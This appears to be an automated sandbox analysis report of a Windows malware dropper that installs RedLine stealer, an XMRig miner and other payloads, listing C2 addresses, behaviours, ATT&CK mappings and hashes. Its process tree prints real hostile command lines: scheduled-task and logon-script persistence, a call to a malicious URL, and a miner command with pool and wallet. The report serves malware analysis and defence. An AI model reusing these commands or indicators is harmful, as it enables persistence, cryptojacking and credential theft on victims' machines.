Analysis

  • max time kernel
    173s
  • max time network
    177s
  • platform
    windows10_x64
  • resource
    win10-en
  • submitted
    10-09-2021 21:28

General

  • Target

    Fri195cd4dbfdf37897.exe

  • Size

    381KB

  • MD5

    45d1381f848b167ba1bca659f0f36556

  • SHA1

    bb282731c8f1794a5134a97c91312b98edde72d6

  • SHA256

    8a1b542e56cf75216fcd1d1dd4bf379b8b4e7a473785013d5fbf6ce02dbdcf28

  • SHA512

    a7171f37ae4612cda2c66fece92deea537942697b4580f938cdd9d07d445d89bac193e934569141fe064355b2a5e675aaa5c348298d96ff1e13dbe01732eeb0f

Malware Config

Extracted

Family

redline

Botnet

zzzzz

C2

146.70.35.170:30905

Extracted

Family

redline

Botnet

Test

C2

18.118.84.99:1050

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 29 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 40 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 12 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 26 IoCs
  • Drops file in Windows directory 41 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 26 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 9 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 61 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2668
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2644
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2572
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2420
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2360
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1852
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1432
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1332
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1264
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1112
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:1040
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                        1⤵
                          PID:296
                        • C:\Users\Admin\AppData\Local\Temp\Fri195cd4dbfdf37897.exe
                          "C:\Users\Admin\AppData\Local\Temp\Fri195cd4dbfdf37897.exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4824
                          • C:\Users\Admin\AppData\Local\Temp\is-TOU3P.tmp\Fri195cd4dbfdf37897.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-TOU3P.tmp\Fri195cd4dbfdf37897.tmp" /SL5="$30052,138429,56832,C:\Users\Admin\AppData\Local\Temp\Fri195cd4dbfdf37897.exe"
                            2⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of WriteProcessMemory
                            PID:4852
                            • C:\Users\Admin\AppData\Local\Temp\is-CND7Q.tmp\Setup.exe
                              "C:\Users\Admin\AppData\Local\Temp\is-CND7Q.tmp\Setup.exe" /Verysilent
                              3⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Drops file in Program Files directory
                              • Suspicious use of WriteProcessMemory
                              PID:5036
                              • C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe
                                "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"
                                4⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:4244
                                • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe
                                  "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:1312
                                  • C:\ProgramData\5531728.exe
                                    "C:\ProgramData\5531728.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2356
                                    • C:\Windows\system32\WerFault.exe
                                      C:\Windows\system32\WerFault.exe -u -p 2356 -s 2080
                                      7⤵
                                      • Program crash
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:692
                                  • C:\ProgramData\4260399.exe
                                    "C:\ProgramData\4260399.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    • Suspicious use of WriteProcessMemory
                                    PID:2636
                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      PID:4924
                                  • C:\ProgramData\6279164.exe
                                    "C:\ProgramData\6279164.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4904
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4904 -s 1876
                                      7⤵
                                      • Drops file in Windows directory
                                      • Program crash
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4144
                                • C:\Users\Admin\AppData\Local\Temp\Mortician.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Mortician.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of WriteProcessMemory
                                  PID:4540
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "cmd" /c cmd < Cerchia.vsdx
                                    6⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:4556
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd
                                      7⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:588
                                      • C:\Windows\SysWOW64\findstr.exe
                                        findstr /V /R "^JdxmflaMoKJKGKEonRKIDlCuNBztuuxobvTVXbusdtKZTUcnQFZrvdHmOhLNQgGwfAjlQJkqLaammCjTuVhBisMuOxuJLaA$" Attesa.vsdx
                                        8⤵
                                          PID:1304
                                        • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                          Impedire.exe.com I
                                          8⤵
                                          • Executes dropped EXE
                                          • Suspicious use of WriteProcessMemory
                                          PID:2632
                                          • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                            C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                            9⤵
                                            • Executes dropped EXE
                                            • Suspicious use of WriteProcessMemory
                                            PID:720
                                            • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                              C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                              10⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:3556
                                              • C:\Users\Admin\AppData\Roaming\RegAsm.exe
                                                C:\Users\Admin\AppData\Roaming\RegAsm.exe
                                                11⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4308
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping localhost
                                          8⤵
                                          • Runs ping.exe
                                          PID:4608
                                  • C:\Users\Admin\AppData\Local\Temp\foradvertising.exe
                                    "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws1
                                    5⤵
                                    • Executes dropped EXE
                                    PID:1088
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "foradvertising.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" & exit
                                      6⤵
                                        PID:4424
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /im "foradvertising.exe" /f
                                          7⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4440
                                    • C:\Users\Admin\AppData\Local\Temp\wrap 1.exe
                                      "C:\Users\Admin\AppData\Local\Temp\wrap 1.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1528
                                    • C:\Users\Admin\AppData\Local\Temp\gdgame.exe
                                      "C:\Users\Admin\AppData\Local\Temp\gdgame.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      • Modifies registry class
                                      PID:1420
                                      • C:\Users\Admin\AppData\Local\Temp\gdgame.exe
                                        "C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a
                                        6⤵
                                        • Executes dropped EXE
                                        PID:2636
                                    • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                      "C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"
                                      5⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Enumerates connected drives
                                      • Modifies system certificate store
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of FindShellTrayWindow
                                      PID:3512
                                      • C:\Windows\SysWOW64\msiexec.exe
                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631050103 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                        6⤵
                                          PID:60
                                      • C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe
                                        "C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        • Checks whether UAC is enabled
                                        • Drops file in Program Files directory
                                        PID:4052
                                      • C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe
                                        "C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                        5⤵
                                        • Executes dropped EXE
                                        PID:1020
                                        • C:\Users\Admin\AppData\Local\Temp\is-63G8M.tmp\IBInstaller_74449.tmp
                                          "C:\Users\Admin\AppData\Local\Temp\is-63G8M.tmp\IBInstaller_74449.tmp" /SL5="$15027E,14736060,721408,C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Drops file in Program Files directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of FindShellTrayWindow
                                          PID:4312
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-CDI03.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                            7⤵
                                              PID:5012
                                              • C:\Windows\SysWOW64\expand.exe
                                                expand C:\Users\Admin\AppData\Local\Temp\is-CDI03.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                8⤵
                                                • Drops file in Windows directory
                                                PID:2660
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                              7⤵
                                                PID:4624
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                  8⤵
                                                    PID:996
                                                • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                  "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:4212
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "cmd.exe" /c start http://closerejfurk32.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                  7⤵
                                                  • Checks computer location settings
                                                  PID:812
                                                • C:\Users\Admin\AppData\Local\Temp\is-CDI03.tmp\{app}\vdi_compiler.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\is-CDI03.tmp\{app}\vdi_compiler"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:4868
                                          • C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
                                            "C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of WriteProcessMemory
                                            PID:4028
                                            • C:\Users\Admin\AppData\Local\Temp\is-QEVD1.tmp\stats.tmp
                                              "C:\Users\Admin\AppData\Local\Temp\is-QEVD1.tmp\stats.tmp" /SL5="$20258,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
                                              5⤵
                                                PID:2176
                                                • C:\Users\Admin\AppData\Local\Temp\is-4MFVK.tmp\Setup.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\is-4MFVK.tmp\Setup.exe" /Verysilent
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1300
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
                                                    7⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:4432
                                                    • C:\Windows\System32\Conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      8⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2176
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
                                                      8⤵
                                                      • Creates scheduled task(s)
                                                      PID:1764
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:3700
                                                  • C:\Users\Admin\AppData\Local\Temp\Services.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\Services.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1820
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
                                                      8⤵
                                                        PID:4424
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
                                                          9⤵
                                                          • Creates scheduled task(s)
                                                          PID:5092
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                        8⤵
                                                        • Executes dropped EXE
                                                        PID:2196
                                                      • C:\Windows\System32\conhost.exe
                                                        C:\Windows/System32\conhost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14444 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=60 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
                                                        8⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4580
                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                          1⤵
                                          • Drops file in Windows directory
                                          • Modifies Internet Explorer settings
                                          • Modifies registry class
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of SetWindowsHookEx
                                          PID:3768
                                        • C:\Windows\system32\browser_broker.exe
                                          C:\Windows\system32\browser_broker.exe -Embedding
                                          1⤵
                                          • Modifies Internet Explorer settings
                                          PID:4100
                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                          1⤵
                                          • Modifies registry class
                                          • Suspicious behavior: MapViewOfSection
                                          • Suspicious use of SetWindowsHookEx
                                          PID:1588
                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                          1⤵
                                          • Drops file in Windows directory
                                          • Modifies Internet Explorer settings
                                          • Modifies registry class
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3816
                                        • \??\c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                          1⤵
                                          • Suspicious use of SetThreadContext
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4380
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                            2⤵
                                            • Checks processor information in registry
                                            • Modifies data under HKEY_USERS
                                            • Modifies registry class
                                            PID:3888
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                            2⤵
                                            • Drops file in System32 directory
                                            • Checks processor information in registry
                                            • Modifies data under HKEY_USERS
                                            • Modifies registry class
                                            PID:1168
                                        • C:\Windows\system32\rUNdlL32.eXe
                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                          1⤵
                                          • Process spawned unexpected child process
                                          PID:4616
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                            2⤵
                                            • Loads dropped DLL
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3640
                                        • C:\Windows\system32\msiexec.exe
                                          C:\Windows\system32\msiexec.exe /V
                                          1⤵
                                          • Enumerates connected drives
                                          • Drops file in Program Files directory
                                          • Drops file in Windows directory
                                          • Modifies data under HKEY_USERS
                                          • Modifies registry class
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4988
                                          • C:\Windows\syswow64\MsiExec.exe
                                            C:\Windows\syswow64\MsiExec.exe -Embedding 6CC96B0D1A4C848A087192173BD29C9C C
                                            2⤵
                                            • Loads dropped DLL
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:1080
                                          • C:\Windows\syswow64\MsiExec.exe
                                            C:\Windows\syswow64\MsiExec.exe -Embedding F1EC2C88562E3EC5345B78A05C155DC0
                                            2⤵
                                            • Blocklisted process makes network request
                                            • Loads dropped DLL
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:3960
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                              3⤵
                                              • Kills process with taskkill
                                              PID:1676
                                          • C:\Windows\syswow64\MsiExec.exe
                                            C:\Windows\syswow64\MsiExec.exe -Embedding 1FDC236C444A6F458D90AF153C13CEC6 E Global\MSI0000
                                            2⤵
                                            • Loads dropped DLL
                                            PID:4864
                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                          1⤵
                                          • Drops file in Windows directory
                                          • Modifies registry class
                                          • Suspicious use of SetWindowsHookEx
                                          PID:2716
                                        • C:\Windows\system32\browser_broker.exe
                                          C:\Windows\system32\browser_broker.exe -Embedding
                                          1⤵
                                          • Modifies Internet Explorer settings
                                          PID:3372
                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                          1⤵
                                          • Modifies registry class
                                          • Suspicious behavior: MapViewOfSection
                                          • Suspicious use of SetWindowsHookEx
                                          PID:3656
                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                          1⤵
                                          • Drops file in Windows directory
                                          • Modifies registry class
                                          PID:312

                                        Network

                                        MITRE ATT&CK Matrix ATT&CK v6

                                        Execution

                                        Scheduled Task

                                        1
                                        T1053

                                        Persistence

                                        Registry Run Keys / Startup Folder

                                        1
                                        T1060

                                        Scheduled Task

                                        1
                                        T1053

                                        Privilege Escalation

                                        Scheduled Task

                                        1
                                        T1053

                                        Defense Evasion

                                        Modify Registry

                                        3
                                        T1112

                                        Install Root Certificate

                                        1
                                        T1130

                                        Credential Access

                                        Credentials in Files

                                        2
                                        T1081

                                        Discovery

                                        Query Registry

                                        4
                                        T1012

                                        System Information Discovery

                                        5
                                        T1082

                                        Peripheral Device Discovery

                                        1
                                        T1120

                                        Remote System Discovery

                                        1
                                        T1018

                                        Collection

                                        Data from Local System

                                        2
                                        T1005

                                        Command and Control

                                        Web Service

                                        1
                                        T1102

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe
                                          MD5

                                          c53dfdfaef23d5e21c54b9da042151bb

                                          SHA1

                                          c68e6028f6109059417baaae012a73b2a255673d

                                          SHA256

                                          9306e1ca910cf51c0638265904c5d1b8edd06548887fc10a37e0ac561a53d8e9

                                          SHA512

                                          bb64a838bf0a68a9ab7abedb075bf55b5968d6944c11f3426c21b694987fcb313de31dff74b47b09a0c675fda993d61d4a28ce4be72e66cc69de6c704cac2597

                                        • C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe
                                          MD5

                                          c53dfdfaef23d5e21c54b9da042151bb

                                          SHA1

                                          c68e6028f6109059417baaae012a73b2a255673d

                                          SHA256

                                          9306e1ca910cf51c0638265904c5d1b8edd06548887fc10a37e0ac561a53d8e9

                                          SHA512

                                          bb64a838bf0a68a9ab7abedb075bf55b5968d6944c11f3426c21b694987fcb313de31dff74b47b09a0c675fda993d61d4a28ce4be72e66cc69de6c704cac2597

                                        • C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
                                          MD5

                                          30e6e113a8bb5b3ef4503fe49a475ce8

                                          SHA1

                                          2b07fa4efe4df32492d99da54f4db62f77a5d20c

                                          SHA256

                                          70b67715a10d7e76fe36ce61e6257665974eef74cd0e26d42c30983f2c49802d

                                          SHA512

                                          ee71207c1e7f204f91bf5edaa966ff7de61fde2714f133c7d5fb95801c031f934a364c1d193ed02261e3bff2eee3feeb68ba3ce52b8563c6eac2969d7ec9bcac

                                        • C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
                                          MD5

                                          30e6e113a8bb5b3ef4503fe49a475ce8

                                          SHA1

                                          2b07fa4efe4df32492d99da54f4db62f77a5d20c

                                          SHA256

                                          70b67715a10d7e76fe36ce61e6257665974eef74cd0e26d42c30983f2c49802d

                                          SHA512

                                          ee71207c1e7f204f91bf5edaa966ff7de61fde2714f133c7d5fb95801c031f934a364c1d193ed02261e3bff2eee3feeb68ba3ce52b8563c6eac2969d7ec9bcac

                                        • C:\ProgramData\4260399.exe
                                          MD5

                                          b9295c5e9138ccf15d67771f3726c778

                                          SHA1

                                          40cd9d94e9913a52877f09f340a5c2604030409c

                                          SHA256

                                          8c4a2330010cdb34faf9f565943736d0bb9d21eb96a67ccc20c246cfe13e6292

                                          SHA512

                                          4e1d7e74be77d151b79024db20f3427c53ddf0557bbccd71b93750514462b5d2d2130948c668b05e66cf4098a56ad34c75ec7d1bd2e21e1c0bda01f7f4345f08

                                        • C:\ProgramData\4260399.exe
                                          MD5

                                          b9295c5e9138ccf15d67771f3726c778

                                          SHA1

                                          40cd9d94e9913a52877f09f340a5c2604030409c

                                          SHA256

                                          8c4a2330010cdb34faf9f565943736d0bb9d21eb96a67ccc20c246cfe13e6292

                                          SHA512

                                          4e1d7e74be77d151b79024db20f3427c53ddf0557bbccd71b93750514462b5d2d2130948c668b05e66cf4098a56ad34c75ec7d1bd2e21e1c0bda01f7f4345f08

                                        • C:\ProgramData\5531728.exe
                                          MD5

                                          93fcdbad1d4afe23c38c68598fdf75a5

                                          SHA1

                                          52af46c797a60a41d91ff1b0de44de650b87f1b4

                                          SHA256

                                          fc20f27943907f412ccd7814a861750ed7c9a620c42f02db024372dbdbcdc41f

                                          SHA512

                                          122adeae0f2b11556f9d59fe72e6ccfd5e72095677c46bce20f4a2e20b4891101599a1cfa157640cf25a420467d12445aa8081c73201ff98b50c107fa36be99f

                                        • C:\ProgramData\5531728.exe
                                          MD5

                                          93fcdbad1d4afe23c38c68598fdf75a5

                                          SHA1

                                          52af46c797a60a41d91ff1b0de44de650b87f1b4

                                          SHA256

                                          fc20f27943907f412ccd7814a861750ed7c9a620c42f02db024372dbdbcdc41f

                                          SHA512

                                          122adeae0f2b11556f9d59fe72e6ccfd5e72095677c46bce20f4a2e20b4891101599a1cfa157640cf25a420467d12445aa8081c73201ff98b50c107fa36be99f

